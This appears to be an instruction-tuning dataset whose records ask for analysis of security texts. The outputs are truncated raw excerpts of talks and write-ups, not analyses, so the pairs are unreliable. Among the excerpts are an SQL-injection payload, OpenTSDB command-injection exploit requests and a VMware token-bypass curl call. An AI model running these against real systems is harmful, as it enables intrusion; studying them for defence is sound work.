{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSQL  Injection & OOB  channels Patrik Karlsson, Inspect it For an updated version of this presentation check http://www.inspectit.se/dc15.html Introduction  Who am I  Patrik Karlsson  Information Security Consultant  Owner of Inspect it  Founder of cqure.net Introduction  What do I do?  Penetration testing  Application Security Reviews  Source code reviews  General information security audits Introduction  What am I presenting?  A speech on SQL-injection with focus on out-of-band channeling  A number of examples using this technique  Why?  Because were still seeing a lot of vulnerable applications   Tunneling data is fun? Introduction  What am I not presenting?  The basics of SQL injection  An arsenal of tools for automatic scanning/hacking web applications  The silver bullet solution to all SQL  injection problems A very brief recap SQL  injection What is SQL  injection  High risk security vulnerability  The ability to inject arbitrary SQL code through poorly validated application parameters  Occurs due to inadequate design and input validation controls  Depending on privileges/patch-levels consequences may range from troublesome to devastating  All source code variables containing data provided by the user could be vulnerable  Forms, URL-parameters, cookies, referrer, user-agent  SQL  injection exemplified  A classic example sql = SELECT usr_id FROM tbl_users WHERE usr_name =  + sUser +  AND usr_pass= + sPass +   What if the user supplies the following password  OR 1=1 -- SQL  injection & OOB channels OOB  channels introduction  Relies on traditional SQL-injection weaknesses for exploitation  Contrary to in-band injection it uses an alternative channel to return data  This channel can take many different forms: timing, http, DNS  Several different approaches exists which dependend on the backend DB OOB  channels introduction  Exploitation using OOB-channels becomes interesting when  detailed error messages are disabled  control is gained late in a query  able to i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Bridge Too Far Defeating Wired 802.1X with a Transparent Bridge Using Linux Alva Lease Skip Duckwall IV Exorcyst at gmail d0t com Who Is This Guy?  Been working with Linux since before the 1.0 kernel (1993ish)  Unix admin by trade  transitioned to IT security  Likes alphabet soup:  CISSP, CISA, GCIH, GCIA, GCFW, GPEN, GWAPT  GCUX, GSEC, GCFA, RHCE, SCSA (missing 12 letters)  Sitting for the GSE written in the middle of August  Works for Northrop Grumman on a team that performs full scope penetration tests  THE BASICS The Objective To introduce a device on a wired 802.1X secured network with the following properties: 1. Transparent (undetectable) to the network administrators 2. Remote communication and interaction 3. The ability to inject traffic on to the network What We Need  Linux Box with 2 network ports  Extra Ethernet Cable  A Workstation authenticating to the local network using wired 802.1X of some sort  Another box that we use to handle the callbacks A laptop/Netbook with an additional USB network device running Linux  Obviously Difficult to Hide  Powerful x86 CPU/memory/HD  Best used for in person demos  Small x86 Computer (industrial/mini pc)  Atom CPU (x86) with 1-2gb memory  Storage via laptop HD or flash  Fanless in many cases  Built in Dual Gig Ethernet in some  4x4.5x1 approximately Plug Computer  Embedded Marvell CPU (ARM) running Linux  512mb ram/512mb internal flash  Can use SD cards for storage / Boot  Fanless  Built in Ethernet/USB port  Looks like a weird wall wart Choice of Linux Distro  Backtrack 4r2 for x86 CPUs  Quiet by default (no services start by default, no network by default, etc)  Well tested and used  Lots of built-in toys  Yes, I know 5 is out. Already had it working with 4.  Ubuntu 9.04 for my plug computer  Newer versions of the hardware might not support it  Moving forward will probably switch to Debian or roll my own distribution Quick Review: Ethernet Frame For TCP/IP (without using 802.1q VLANS) this is what an Ethernet fra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# somestufflsimportant * Category: Web Application * 500 Points * Solved by the JCTF Team ## Description > Can you find it? https://somestufflsimportant.challenges.bsidestlv.com/ ## Solution We access the site and get the following response: ```console root@kali:/media/sf_CTFs/bsidestlv/somestufflsimportant# curl https://somestufflsimportant.challenges.bsidestlv.com/ The Flag is: BSidesTLV{<strong>1 c</strong><br> ``` This was the only challenge with HTTPS, so we assumed it was related. However, we couldn't find any additional information or clues in the certificate, decrypted traffic or elsewhere. The breakthrough came when trying to access the website via TLS1.1: ```console # curl https://somestufflsimportant.challenges.bsidestlv.com/ --tlsv1.1 The Flag is: BSidesTLV{<strong>3 p</strong><br> ``` After isolating the behavior, it was revealed that each different cipher provides a different part of the flag. The following script tries all the ciphers OpenSSL has to offer: ```python import socket, ssl import http.client import subprocess import re FLAG_RE = re.compile(\"The Flag is: BSidesTLV{<strong>(\\d+) (.+)</strong><br>\") def send_request(cipher): res = None c = None try: context = ssl.create_default_context() context.set_ciphers(cipher) c = http.client.HTTPSConnection(\"somestufflsimportant.challenges.bsidestlv.com\", context = context) c.request(\"GET\", \"/\") response = c.getresponse() data = str(response.read()) match = FLAG_RE.search(data) if match: res = (match.group(1), match.group(2)) else: print (\"\\tWarning: The following response did not match the regex: {}\".format(data)) except: pass if c is not None: c.close() print (\"[{}] {}\".format(\"V\" if res is not None else \"X\", cipher)) return res flag_map = {} cipher_list = subprocess.check_output(['openssl', 'ciphers']).decode(\"ascii\").strip() for cipher in cipher_list.split(\":\"): res = send_request(cipher) if res is None: continue index, char = res flag_map[int(index) - 1] = char max_index = max(flag_map) flag = [\"?\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents DNSSEC Downgrade Attacks Haya Shulman, Elias Heftrig, Michael Waidner #BHUSA @BlackHatEvents Information Classification: General Why DNSSEC Downgrade Attacks? DNS is involved in virtually all transactions on the Internet and many mechanisms rely on its security  when determining which IP host to send packets to  password recovery  ACME/Domain Validation for obtaining X.509/HTTPS Certificates  authorization of X.509 CAs and authentication of certificates  also: SSH host key fingerprints, IPSec Keys,  DNSSEC is the go-for solution to achieve DNS record security  while everybody here has probably heard of downgrade attacks on TLS  downgrade attacks on DNSSEC have not seen much attention up until now #BHUSA @BlackHatEvents Information Classification: General Agenda  DNS(SEC) Refresher  DNSSEC Downgrade Attacks  Attacks to Weaken Security  Attacks to Break Security  Recommendations #BHUSA @BlackHatEvents Information Classification: General Agenda  DNS(SEC) Refresher  DNSSEC Downgrade Attacks  Attacks to Weaken Security  Attacks to Break Security  Recommendations #BHUSA @BlackHatEvents Information Classification: General DNS Resolution  Common Setup Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(www.bank.ing.) www.bank.ing. IN A? bank.ing. 3600 IN NS ns.bank.ing. 1 2 3 4 5 6 7 8 9 A B C #BHUSA @BlackHatEvents Information Classification: General DNS Poisoning Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(www.bank.ing.) www.bank.ing. IN A? www.bank.ing. 2600 IN A 6.6.6.6  Attack on DNS Record Authenticity #BHUSA @BlackHatEvents Information Classification: General DNS Poisoning Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(www.bank.ing.) www.bank.ing. IN A? www.bank.ing. 2600 IN A 6.6.6.6  Attack on DNS Record Authenticity #BHUSA @BlackHatEvents Information C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright2019 nao_sec All Rights Reserved. 1 Copyright2019 nao_sec All Rights Reserved. Who are we  Shota Nakajima  Malware Analyst  Engage in incident response  Work at Cyber Defense Institute, Inc. in Japan  Rintaro Koike  Chief researcher / founder of nao_sec  Threat Hunter  Malicious traffic / script / document analyst  Especially Drive-by Download attack 2 Copyright2019 nao_sec All Rights Reserved. Public Service for Hunting  VirusTotal  Private API  Yara (Live & Retro Hunt)  Hybrid Analysis  Yara (Retro Hunt)  ATT&CK Tactic & Technique  ANY.RUN  ATT&CK Technique  Suricata SID 3 Copyright2019 nao_sec All Rights Reserved. VirusTotal Private API  Our queries  maldoc(0 < positive) submitter JP  suspicious(0 < positive) zip submitter JP  suspicious(0 < positive) lnk submitter JP  suspicious(0 < positive) rtf submitter JP  email submitter JP 4 Copyright2019 nao_sec All Rights Reserved. VirusTotal Private API  Engines  if you want hunt specified family 5 Copyright2019 nao_sec All Rights Reserved. VirusTotal Livehunt  Have been set following rules  CVE_2018_0798  CVE_2017_11882  CVE_2018_0802  CVE_2018_20250 6 Copyright2019 nao_sec All Rights Reserved. Hybrid Analysis 7 Copyright2019 nao_sec All Rights Reserved. Hybrid Analysis 8 Copyright2019 nao_sec All Rights Reserved. ANY.RUN 9 Copyright2019 nao_sec All Rights Reserved. T1170 - Mshta 10 Copyright2019 nao_sec All Rights Reserved. Gorgon Group 11 Copyright2019 nao_sec All Rights Reserved. T1085  Rundll32 12 Copyright2019 nao_sec All Rights Reserved. OceanLotus 13 Copyright2019 nao_sec All Rights Reserved. T1137 - Office Application Startup 14 Copyright2019 nao_sec All Rights Reserved. Tick 15 Copyright2019 nao_sec All Rights Reserved. TA544 16 Copyright2019 nao_sec All Rights Reserved. TA544  Attack by TA544 (Cutwail-A / invoice) Group  Maldoc disguised as a purchase order, bill etc...  The purpose is to infect Ursnif and steal user information  Attack campaign has been observed since around June 2016  Started to us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# OpenTSDB arbitrary commands injection (CVE-2020-35476) [中文版本(Chinese version)](README.zh-cn.md) OpenTSDB is a distributed, scalable Time Series Database (TSDB) written on top of HBase. A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.) References: - https://github.com/OpenTSDB/opentsdb/issues/2051 - https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html ## Vulnerable Environment Execute the following command to start a OpenTSDB server 2.4.0: ``` docker compose up -d ``` Once the service is started, visit `http://your-ip:4242` to see the web interface of the OpenTSDB. ## Exploit You need to know the name of a metric before you can exploit this vulnerability on `http://your-ip:4242/api/suggest?type=metrics&q=&max=10`: ![](1.png) However, the metrics list is empty. Fortunately, the `tsd.core.auto_create_metrics` is set to `true` in this vulnerable OpenTSDB, so you can create a metric named `sys.cpu.nice` through following request: ``` POST /api/put/ HTTP/1.1 Host: your-ip:4242 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 150 { \"metric\": \"sys.cpu.nice\", \"timestamp\": 1346846400, \"value\": 20, \"tags\": { \"host\": \"web01\", \"dc\": \"lga\" } } ``` If at least one metric exists and is not empty, the above request is not required. Send following request, where the value of the parameter `m` must contain a valid metric name: ``` GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的白帽学习路路线 @ringzero 2017/03/25  阿里里云  高级安全专家  十年年信息安全从业经历  信息安全领域爱好者  自动化安全测试  数据挖掘  微博@ringzero 关于我 进谷歌 找记录 没记录 就旁注 没旁注 猜目录 没目录 就嗅探 找后台 穷枚举 传小马 放大马 偷密码 挂页面 提权限 扫内网 啊D-SQL注入 NBSI 明小子 桂林林老老兵 引用 : 自动化攻击背景下的过去现在与未来  2014年年 回到十三年年前  2004年年的套路路 架设了了一个PHPWind论坛 CentOS 编译安装LAMP环境 DVBBS.NET HACKED DISCUZ.NET HACKED PHPWIND.NET HACKED 不不需要了了解技术原理理的漏漏洞洞年年代  2006年年 架设了了一个Discuz论坛 架设了了一个Dvbbs论坛 安全技术学习 承认自己的弱点不不是丑事 回炉再造 Know it Then Hack it  2008年年 只有对原理理了了然于心 才能突破更更多的限制 硬件 Hardware 系统 OS 网络 Network 应用 Application 数据 Database 网易易公开课 http://study.163.com/curricula/cs.htm 我的再造学习技能树 总线/存储器器 运算器器 CPU处理理器器 输入输出外设 启动/调用 进程/线程 内存管理理 文件系统 CPU结构 指令集 寻址方式 硬件 Hardware 系统 OS 网络 Network 应用 Application 数据 Database TCP/IP详解-卷1-视频 密码nq9t https://pan.baidu.com/s/1hqU83u0 我的再造学习技能树 硬件 Hardware 系统 OS 网络 Network 应用 Application 数据 Database CSS / HTML / JavaScript / Flash 权威指南 我的再造学习技能树 XSS CSRF 跨域 跨站 AJAX DOM 硬件 Hardware 系统 OS 网络 Network 应用 Application 数据 Database 兄弟连 PHP MySQL 开发 视频 后盾网 PHP 开发 视频 Laravel/ThinkPHP/Yii/CodeIgniter MSSQL .NET 开发 视频 中谷教育 Python 视频 (密码: qg22) Django/Flask/Tornado 动力力节点 J2EE 开发视频 (密码: qda8) Servlet/JSP/反射机制 Spring4/Struts2/Hibernate5/MyBatis3 我的再造学习技能树 硬件 Hardware 系统 OS 网络 Network 应用 Application 数据 Database  内存  Redis  Memcache  SQL  MySQL  MSSQL  Oracle  PostgreSQL  NoSQL  MongoDB 我的再造学习技能树 重新理理解WEB安全技术 注入漏漏洞洞  SQL注入  命令注入  表达式/代码注入  SSRF网络注入 文件  XXE  文件包含  任意文件读取  任意文件上传 前端漏漏洞洞  XSS  CSRF  ClickJacking 逻辑漏漏洞洞  穷举遍历  水平越权  流程乱序  数据篡改  未授权访问 信息泄露露  配置文件  测试文件  备份文件  接口暴暴露露  心脏滴血 二进制漏漏洞洞  缓冲区溢出  堆/栈溢出  内存泄露露 拒绝服务 暴暴力力破解 PHP+MYSQL+前端 实战开发经验 熟练 Python PHP GoLang C/C++ MySQL MongoDB Redis ElasticSearch 精通SQL查询 开发框架 分布式开发 正则表达式 回炉后的自动化开发栈 回炉后的自动化开发栈 C/C++ ElasticSearch Logstash Kibana ELK Stack 深入浅出 视频 A Tour of Go Go语言圣经中文版 ELK Stack GoLang C++ 开发工程师 (侯捷C++) 猎豹网校(Primer STL+数据结构算法)(密码:y1ie) 回炉后的横向知识栈 汇编ASM Linux内核开发与调试 张银奎 深入软件调试 张银奎 调试技术 小甲鱼汇编语言视频 (密码: 285a) 移动开发 iOS开发工程师 (Objective-C/Swift 高级编程) Android开发工程师(网络/数据存储/应用/项目实战) 知识面决定看到的攻击面有多广 知识链决定发动的杀伤链有多深 DB  大学课堂验证校服  网络课堂", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1990 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: bindtags.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbCl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### ICS_CTF 利用概述 > ICS CTF竞赛内容来自于作者自身打比赛经验如有不对之处请各位多多谅解 Exploit是针对某种漏洞提供的多种利用方法针对某一种漏洞可以有很多利用方法 针对工控领域其实目前多见的利用方式组态利用通信劫持Web渗透 ### ICS_CTF组态利用概述 组态是工控场景的核心是工控编程与实现功能的核心内容如果你不太懂组态请自行学习自动化领域工业控制系统组态的相关书籍 最好的学习方式是拿到相关的产品说明书针对说明书上的内容一点一点学习 组态的利用方法 1. 强制IO(最管用的一种调试方法) 2. 工程加密与解密工程加密是PLC一种保护措施但仍存在被破解的可能 3. 上载下载基础概念请自行恶补 4. PLC等目标设备的内存分布基础概念请自行恶补 5. 其他附加功能例如ftpntp等 ### ICS_CTF通信劫持概述 通信劫持是工控场景中最经典利用方式例如ARP劫持PLC/HMI通信劫持PLC会话劫持PLC命令执行等内容 通信劫持的方法 1. ARP劫持ARP劫持可以阻断PLC与其他设备的通信鉴于工程会存在写死IP等交互地址未必管用但是值得一试 2. PLC/HMI通信劫持采用旁路设备接入或控制PLC设备对IO进行强制重写或输出 3. PLC命令执行针对工控设备最敏感的部分是设备宕机无法恢复的设备启停设备强制更新参数等等这些对普通工艺能够产生较大的影响 ### ICS_CTFWeb渗透概述 目标企业往往存在Web类工控应用例如发布工艺发布页面用户数据库等页面这些内容基本与平日Web题目无异 1. 弱口令工控里比较常见工控设备中厂商默认密码 2. 命令注入比较普遍需要审计Web工程源码 3. 目录遍历手测简单利用难需要结合上传等功能实现 4. 预置后门比较难以发现需要逆向和Web渗透相结合 5. SQL类注入比较简单 6. XSS在这里基本无用基本没怎么遇到过 7. 工程文件泄露.git/.idea/.project等工程文件泄露", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Super Secret Hidden Service Web, 50 points ## Description: > https://138.247.13.115 ## Solution: Trying to access the website, we get an error that the certificate provided by the server is not trusted. If we try to bypass this with `curl -k`, we get: ``` 421 Site 138.247.13.115 is not served on this interface ``` Let's inspect the certificate: ```console root@kali:/media/sf_CTFs/mitre/SuperSecretHiddenService# openssl x509 -in CaddySelfSigned.crt -inform der -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 8c:96:2c:fd:b5:7c:b8:a9:ab:38:8b:bf:07:0a:80:e6 Signature Algorithm: ecdsa-with-SHA256 Issuer: O = Caddy Self-Signed Validity Not Before: Feb 22 17:44:31 2019 GMT Not After : Mar 1 17:44:31 2019 GMT Subject: O = Caddy Self-Signed Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:1b:56:82:6f:a8:f9:a3:4c:06:a8:1f:da:59:ea: ef:a1:cd:c2:97:af:28:c7:ab:dc:b1:73:15:63:62: be:6c:c3:13:f4:91:6e:7f:ce:e3:6d:19:a0:9b:38: 29:19:4e:c9:d8:04:b9:72:22:d4:48:3d:9d:de:32: 5c:3b:62:e0:f0 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Subject Alternative Name: DNS:138.247.13.115.xip.io Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:a9:95:71:a7:5e:06:ee:14:9d:1c:90:35:d8: b2:15:40:53:5f:2b:d5:20:c5:15:1b:db:12:3d:69:70:6c:4f: 59:02:20:03:ad:a6:68:d0:7e:a5:e4:86:0b:16:d4:8f:1d:f1: 5a:64:02:eb:11:13:3e:a1:ce:f5:43:8e:a7:b1:1d:90:bb ``` The certificate is issued to `138.247.13.115.xip.io`. We try to access this FQDN and get the flag: ``` root@kali:/media/sf_CTFs/mitre/SuperSecretHiddenService# curl -k https://138.247.13.115.xip.io Flag is: MCA{shuHeimoowaiF5a} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0-Day 輕鬆談 (0-Day Easy Talk) 2013/07/19 @ HITCON <Orange@chroot.org> Happy Fuzzing Internet Explorer 0-Day 甘苦談 (0-Day WTF Talk) 2013/07/19 @ HITCON <Orange@chroot.org> Happy Fuzzing Internet Explorer 這是一場簡單的演講 This is an Easy Talk 分享一些我的 Fuzzing 心得 Share Some Fuzzing Review of Mine 以及很順便的丟個 0-Day 出來 And Disclosed a 0-Day in Passing 大家好 Hello, Everyone 我是 Orange This is Orange Speaking 現任大學生 I am a College Student, Now CHROOT.org 成員 Member of CHROOT.org DevCo.re 打工中 Part-Time Work at DevCo.re 揭露過一些弱點 Disclosed Some Vulnerabilities cve 2013-0305 cve 2012-4775(MS12-071) About Me  蔡政達 aka Orange  2009 台灣駭客年會競賽 冠軍  2011, 2012 全國資安競賽 金盾獎冠軍  2011 東京 AVTOKYO 講師  2012 香港 VXRLConf 講師  台灣 PHPConf, WebConf, PyConf 講師  專精於  駭客攻擊手法  Web Security  Windows Vulnerability Exploitation 如果對我有興趣可以到 blog.orange.tw If You are Interesting at Me. You Can Visit blog.orange.tw 我專注於 Web Security & 網路滲透 I Focus on / Interested in Web Security & Network Penetration 但今天來聊聊 0-Day 以及 Fuzzing (不是我專門的領域 QQ) But Today Let's Talk About 0-Day and Fuzzing (I am Not Expert in This, But Just Share) Conference-Driven 0-Day n. 名詞 釋義: 為了研討會生 0-Day 在找 0-Day 中的一些筆記 Some Notes in Finding 0-Day 這次我們討論 IE This Time We Talk About IE http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero- days-an-price-list-for-hackers-secret-software-exploits/ Hacker's Good Friend 方法  White Box  Code Review (IE5.5 Source Code)  二話不說丟進 IDA  Black Box  Fuzzing Fuzzing  Garbage in Garbage out  理論上可以找到所有漏洞  前提是你有無限的時間 時間越多 0-Day 越多 -貝拉克.歐巴馬 Fuzzing Model Generator Debugger Result Logger http://youtube.com/watch?v=m7Xg-YnMisE Debugger  Windows Debug API  DebugActiveProcess  WaitForDebugEvent  ContinueDebugEvent  好麻煩  快速客制化的 Debugger PyDBG A Pure Python Windows Debugger Interface Debug a Process >>> import pydbg >>> dbg = pydbg() >>> dbg.load( file ) # or dbg.attach( pid ) >>> dbg.run() Set Breakpoint >>> dbg.bp_set( address, callback ) >>> dbg.set_callback( exception_code, callback ) Memory Manipulation >>> dbg.read( addr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVmware CB Workload 360 政企安全 Skay-2021.9.14 2 Vmware CB workload 3 查看分别监听了哪些端口 端口的启动文件 全局搜索jar class 确定工作目录 Vmware CB worktaion 4 Vmware CB workload 拿到手后是一个ova文件直接导入vmware 改ssh配置文件root登录/opt/vmware 为工作目录配置及启动文件也在这里 调试三个springboot jar包 分别配置远程调试 Vmware CB workload 5 工作目录打包扒下来对jar包配置远程调试 tar czvf test.tar.gz * Vmware CB workload 6 工作因为jar包是fatjar所以还需要对jar包进行更改再 add as library Vmware CB workload 7 Run.sh 启动脚本添加启动参数即可 Vmware CB workload 8 最终idea项目配置如下 VMware CB Workload 漏洞挖掘及复现 9 Vmware CB workload 10 最终首先整体了解下虚拟机默认安装后开启了哪些端口及服务 Envoy 11 Envoy 是专为大型现代 SOA面向服务架构架构设计的 L7 代理和通信总线 去看它的配置文件 Envoy 12 Vmware CB workload 13 最终再结合查看java进程 Vmware CB workload 14 我们对这个组件的大体架构有了一个了解接下来回到漏洞本身我们能拿到的就只有一个官方通告 https://www.vmware.com/security/advisories/VMSA-2021-0005.html是一个身份绕过 Vmware CB workload 15 我们回到拖出来的代码本身是Spring boot 且用了Spring Security + jwt 做身份校验 三个项目分别有三个SecurityConfiguration Vmware CB workload 16 跟了一遍身份校验流程后没什么大思路不如直接diff以下 官方通告里给出了1.0.2 为修复版本下载1.0.2 并安装将工作目录dump下来进行diff Vmware CB workload 17 跟了一遍身份校验流程后没什么大思路不如直接diff以下 官方通告里给出了1.0.2 为修复版本下载1.0.2 并安装将工作目录dump下来进行diff Vmware CB workload 18 Diff一圈儿 最终定位到这里 Vmware CB workload 19 URL有了 怎么去定位请求处理类 关键字搜(需要反编译 反编译后还有一个好处可以find usage) 或者因为是Spring的项目所以可以在调试时获取所有请求url的处理类 Vmware CB workload 20 最终找到com.vmware.cwp.appliance.acs.api.controller.TokenGeneratorApi Vmware CB workload 21 最终找到com.vmware.cwp.appliance.acs.api.controller.TokenGeneratorApi curl http://localhost:3010/acs/api/v1/service-token/apw 本机访问成功获取token Vmware CB workload 22 回去看com.vmware.cwp.appliance.acs.security.config.SecurityConfigurationi也确实配置了白名单放行 Vmware CB workload 23 先别高兴的太早这个api无法在外网直接访问 先去跟调用栈意外找了了一个不能30X的ssrf Vmware CB workload 24 当URL存在临时(302)或永久(301)跳转时则继续请求跳转后的URL 那么我们可以通过HTTP(S)的链接302跳转到任意我们想要访问的地址上 Vmware CB workload 25 com.vmware.cwp.appliance.acs.delegate.impl.VCReqValidatorController#validate 进入这个逻辑即可 SSRF 30X 26 当URL存在临时(302)或永久(301)跳转时则继续请求跳转后的URL 那么我们可以通过HTTP(S)的链接302跳转到任意我们想要访问的地址上 配置301跳转 27 Vmware CB workload 28 没反应,不能用SSRF 串起来打了 Vmware CB workload 29", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacker Law School \"We went to law school so you don't have to\" 2013 Summer Quarter D E F C O N Faculty Bio Marcia Hofmann  Currently solo digital rights attorney  7 Years at the EFF  3 Years at EPIC  Adjunct faculty at the University of California Hastings College of Law in San Francisco  Licensed to practice law in CA, DC Faculty Bio Jim Rennie  3 years doing Internet privacy compliance & policy work in San Francisco  3 years as a Public Defender in Las Vegas  Prior to law school, 3 years as a web developer  Attended way too many hacker cons over the last 14 years  Licensed to practice law in CA, NV Disclaimers I am not YOUR attorney  Nothing you say to me is covered by attorney- client privilege  I don't know enough about your particular situation to advise you personally This is not \"legal advice\"  This is a very general overview and may not apply to you or your specific situation  Don't get your legal advice from someone at a con (even if we're correct about the law) What is Hacker Law School? The basic legal education you need (and shouldve been taught in high school), customized for the hacker community What You're Going to Learn The basics of: Intellectual Property Criminal/Civil Substantive Law Criminal Procedure How the law applies to real life situations Why learn about these laws? If you're doing online security research, you need to be able to understand the risks. What do you mean by \"risk\"? A couple distinct, separate things. (1) The likelihood of becoming an attractive target for a lawsuit or prosecution, either with or without basis. (2) The likelihood that a court might decide that youve run afoul of the law. What You're NOT Going to Learn Anything other than the basics for risk-spotting To be afraid Feedback Hacker Law School is always changing, updating, and making itself better Please let us know if you have questions or suggestions for improvement jim@hackerlawschool.com marcia@hackerlawschool.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njed === 主要用于编辑代码的编辑器 ## 补充说明 **jed命令** 是由Slang所开发其主要用用途是编辑程序的源代码它支持彩色语法加亮显示可以模拟emacsEDTwordstar和Brief编辑器 ### 语法 ```shell jed(选项)(参数) ``` ### 选项 ```shell -2显示上下两个编辑区 -batch以批处理模式来执行 -f<函数>执行Slang函数 -g<行数>移到缓冲区中指定的行数 -i<文件>将指定的文件载入缓冲区 -n不要载入jed.rc配置文件 -s<字符串>查找并移到指定的字符串 ``` ### 参数 文件指定待编辑的文件列表 ### 实例 以上下两个编辑区的方式开启 mysource.c 原始代码文件若要切换编辑区可利用稍后介绍的命令开启操作命令开启功能表后按 3 再按 2 即可切换编辑区 ```shell jed -2 mysource.c ``` **操作** 有些Emacs的组合键和jed菜单组合键冲突例如Alt+f在Emacs中应该是前进一个单词而在jed中则是文件菜单 想使用Emacs风格的组合键的话编辑`/usr/share/jed/lib/menus.slc`找到如下段落 ```shell unsetsetkey (\"selectmenubar\", \"\\em\"); unsetsetkey (\"@\\emF\", \"\\ef\"); unsetsetkey (\"@\\emE\", \"\\ee\"); unsetsetkey (\"@\\emo\", \"\\eo\"); % Mode menu unsetsetkey (\"@\\emS\", \"\\es\"); unsetsetkey (\"@\\emB\", \"\\eb\"); unsetsetkey (\"@\\emi\", \"\\ei\"); unsetsetkey (\"@\\emH\", \"\\eh\"); unset_setkey (\"@\\emy\", \"\\ey\"); ``` 可以根据自己的需要修改也可以简单的注释掉使用菜单可以用F10键 由于Jed可模拟多种编辑器其各自按键指令也有所不同这里以模拟 Emacs 为例说明在编辑器中的操作方法 **文件** ```shell /usr/share/jed/lib/*.sl 这是默认的运行jed slang的文件 /usr/share/jed/lib/site.sl 这是默认的启动文件 /etc/jed.rc 这是全局系统配置文件 ~/.jedrc 这是用户配置文件 ```", "category": "text_analysis", "source": "security_papers"}
